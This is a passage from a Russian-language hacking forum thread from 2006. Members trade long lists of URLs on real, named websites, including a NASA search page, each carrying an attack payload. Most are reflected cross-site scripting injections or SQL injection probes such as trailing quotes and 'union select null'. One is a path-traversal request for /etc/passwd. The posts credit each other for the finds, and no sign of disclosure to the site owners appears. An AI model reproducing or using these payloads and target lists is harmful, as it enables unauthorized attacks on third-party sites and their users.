    http://www.w3.org/Search/Mail/Publi...type=t&type-index="><script>alert(2)</script>
    http://serial.com/?show=<script>alert()</script>&submit=Search
    http://www.phpbuilder.com/snippet/browse.php?by=cat&cat=1\"style=background:url(javascript:alert());\"
    http://poisk.ru/#\"><script>alert()</script>
    http://an.aport.ru/scripts/template.dll?That=ref&r="><script>alert()</script>&Base=referat&Rt=2
    http://www.sexvideogid.ru/search.php?q="><script>alert()</script>
    http://www.ag.ru/cheats/baldurs_gate_2_throne_of_bhaal/15170\"><script>alert()</script>
    http://catalog.aport.ru/rus/themes.aspx?id=1778\'\"><xz>
    http://multifon.ru/stm/stm_popup.php?pid=54&type=jpg&name=666&url=\"style=background:url(javascript:alert());\"
    http://www.iceberg.ru/services/?id=23\'&parent=0http://www.spguwc.h15.ru/gb/index.php?action=viewcommentshttp://www.yuretz.ru/prikol.php?id=384\'
    http://forum.farit.ru/calendar.php?s=&action=edit&eventid=14\'
    http://www.naec.ge/?search_string=%22%3E%3Cscript%3Ealert()%3C/script%3E
    http://www.xoxma.od.ua/xoxma/10/473\'
    http://www.koms.ru/forum(page2).php?conf=aa
    http://www.tom-muck.com/blog/master.cfm?searchbox=\"><script>alert()</script>&Submit=Search
    http://www.tom-muck.com/blog/index.cfm?month=12&year=2005&newsmonth=12/1/2005\'
    http://www.webbe.de/index.shtml?CON...RCH="><script>alert()</script>&ASSOCIATION=OR
    http://mobile.optima.ua/bomba.php?c_id=10\'&lim=40\'\"><script>alert()</script>
    http://comp-lik.biz/index.php?q=<script>alert()</script>&search_news=1&search_articles=1&search_downloads=1&search_links=1&search_faq=1&search_gallery=1&search_static=1&p=query&area=1
    http://comp-lik.biz/index.php?categ=9\'&parent=0&p=downloads&area=1
    http://www.prokredo.ru/ru/library/index.php?q13=&t13=&c13=20\'&show13=materials
    http://card.romanticcollection.ru/toprated.php?page=<script>alert()<script>
    http://blog.msk.ru/login.php?login=<script>alert()</script>&pass=&submit=OK
    http://www.paladins.ru/znaxar.php?free=\"><script>alert(1)</script>&sila1=3\"><script>alert(2)</script>&lovk1=3\"><script>alert(3)</script>&intuiz1=3\"><script>alert(4)</script>&vinos1=12\"><script>alert(5)</script>&intel1=\"><script>alert(6)</script>&mudr1=\"><script>alert(7)</script>&sila2=\"><script>alert(8)</script>&lovk2=\"><script>alert(9)</script>&intuiz2=\"><script>alert(10)</script>&vinos2=\"><script>alert(11)</script>&intel2=\"><script>alert(12)</script>&mudr2=\"><script>alert(13)</script>&flag=2\"><script>alert(14)</script>
    http://horoscopes.rambler.ru/day.html?day=1<script>alert(1)</script>&month=4&year=1965<script>alert(2)</script>
    http://nakarte.rambler.ru/moscow/?query='
    http://www.mebelm.com/search/?q=\'
    http://www.ddd.kursknet.ru/cgi-bin/chat.pl?id=&language=<script>alert()</script>
    http://games.alkar.net/csreg/chpass.php?filled=&account=\"><script>alert()</script>&password=&sendpass=
    http://sofit.com.ua/rus/asearch/0/1/0/?ser_mid=-1&go_search=1&q_search=\"><script>alert()</script>
    http://7000.ru/computers/details.php?id=2\'
    http://www.softportal.com/search.php?search=1&search_string=\"><script>alert()</script>
    http://catalog.begun.ru/?q=\"><script>alert()</script>
    http://cio.iv.ru/search.html в поиске sql пример 666\'
    http://www.3a.kiev.ua/good.php?name=<script>alert()</script>
    http://referat.na5.ru/load.php?id=504948\'
    http://referat.apple-online.ru/index.php?type=diplom_1&id=3478\'
    http://www.mobiteka.ru/melodies/melodies.shtml?artid=27\'
    http://valinfo.ru/testresult.php?idtestgroup=0\'
    http://www.newstrack.ru/newstrack3/portal/news/view/20050414/a/
    http://www.1bb.ru/directory.php?cat=35\'
    http://orsn.rambler.ru/baza/consult/index.php?action=tema&kod=1\"><script>alert()</script>
    http://katz.ws/?q=\"><script>alert()</script>
    http://www.flashmaster.ru/search/index.php?words=\'
    http://www.flashmaster.ru/search/in...=rating&section[]=swf&section[]=forum&page=17
    http://www.ext.ru/?id=7\"><script>alert()</script>
    http://bbcom.ch/index.php?suche_wort=\"><script>alert()</script>
    http://www.igromania.ru/games/?666\'
     
    4 people like this.
  13. .Slip

    .Slip Elder - Старейшина

    Joined:
    16 Jan 2006
    Messages:
    1,594
    Likes Received:
    976
    Reputations:
    783
    У меня вопрос, зачем в строке http://www.ext.ru/?id=7\"><script>alert()</script>
    /? И без него всё отлично запускается)
     
  14. degeneration x

    degeneration x Elder - Старейшина

    Joined:
    11 Oct 2005
    Messages:
    96
    Likes Received:
    38
    Reputations:
    21
    Очень много повторных.
     
  15. ZetRider

    ZetRider Elder - Старейшина

    Joined:
    18 Dec 2004
    Messages:
    38
    Likes Received:
    13
    Reputations:
    4
    Ну уж извените, как смог!
    Большинство багов принадлежат Киборгу! Респект чувак!
     
    #155 ZetRider, 24 May 2006
    Last edited: 24 May 2006
  16. EST a1ien

    EST a1ien Elder - Старейшина

    Joined:
    2 Apr 2006
    Messages:
    257
    Likes Received:
    48
    Reputations:
    16
    _http://plg.lrn.ru/index.php?sub=proj&sort=1
    Нефильтруется ниодин параметр XSS(актив)
     
  17. .Slip

    .Slip Elder - Старейшина

    Joined:
    16 Jan 2006
    Messages:
    1,594
    Likes Received:
    976
    Reputations:
    783
    _http://www.information.com/search/index.html?brand=1&cat=1&keyword=slip"><script>alert(/slip/)</script>
     
  18. back0rifice

    back0rifice Active Member

    Joined:
    16 Mar 2006
    Messages:
    328
    Likes Received:
    107
    Reputations:
    19
    Отжёг... А самому искать - не судьба?!

    _http://www.aif.md/index.asp?qu=%3Cscript%3Ealert%28%2Ff0und_by_back0rifice%29%3C%2Fscript%3E&Submit=%CD%E0%E9%F2%E8&doc=search
    _http://www.climate.md/?page='client/belt
    _http://www.dnestrblog.net/comunity/blogs/lianc/commentrss.aspx?PostID=252'
    _http://www.forum.md/Discuss.aspx?id=700595'
    _http://www.galanter.net/guests/showguest.asp?Account=9'
    _http://www.iks.ru/etc/passwd
    _http://www.meteoprog.com.ua/gorodMira.php?cityid=277'
    _http://www.sdarm.md/shownews.php?id=14'
    _http://www.takt.tomsk.ru/db/trav2.list_member?pid=513'
    _http://www.transneogrup.md/news/news.php?ln=ru&s=n&id=76'
    _http://www.yes.md/RemarkList.aspx?theid=25&disid=1018'
     
    #158 back0rifice, 25 May 2006
    Last edited: 25 May 2006
    1 person likes this.
  19. EST a1ien

    EST a1ien Elder - Старейшина

    Joined:
    2 Apr 2006
    Messages:
    257
    Likes Received:
    48
    Reputations:
    16
    _http://shveimash.spb.ru/index.php?type=pages&id=-1+union+select+null,null/*
    _http://shveimash.spb.ru/index.php?type=catalog&id=111&brand=%3Cscript%3Ealert(12)%3C/script%3E
     
    1 person likes this.
  20. .Slip

    .Slip Elder - Старейшина

    Joined:
    16 Jan 2006
    Messages:
    1,594
    Likes Received:
    976
    Reputations:
    783
    _http://search.nasa.gov/search/search?searchType=lb&q=%3C%2Ftitle%3E[sL1p]%20%20%3Ctextarea+style%3D%22display%3Anone%22%3E&btnG=GO&output=xml_no_dtd&sort=date%3AD%3AL%3Ad1&site=nasa_collection&ie=UTF-8&oe=UTF-8&client=nasa_production_lb&proxystylesheet=nasa_production_lb&actionType=searchIndex&numgm=5

    Вот такое крутое наса :)
     
    #160 .Slip, 25 May 2006
    Last edited: 27 May 2006
    2 people like this.
Loading...
Thread Status:
Not open for further replies.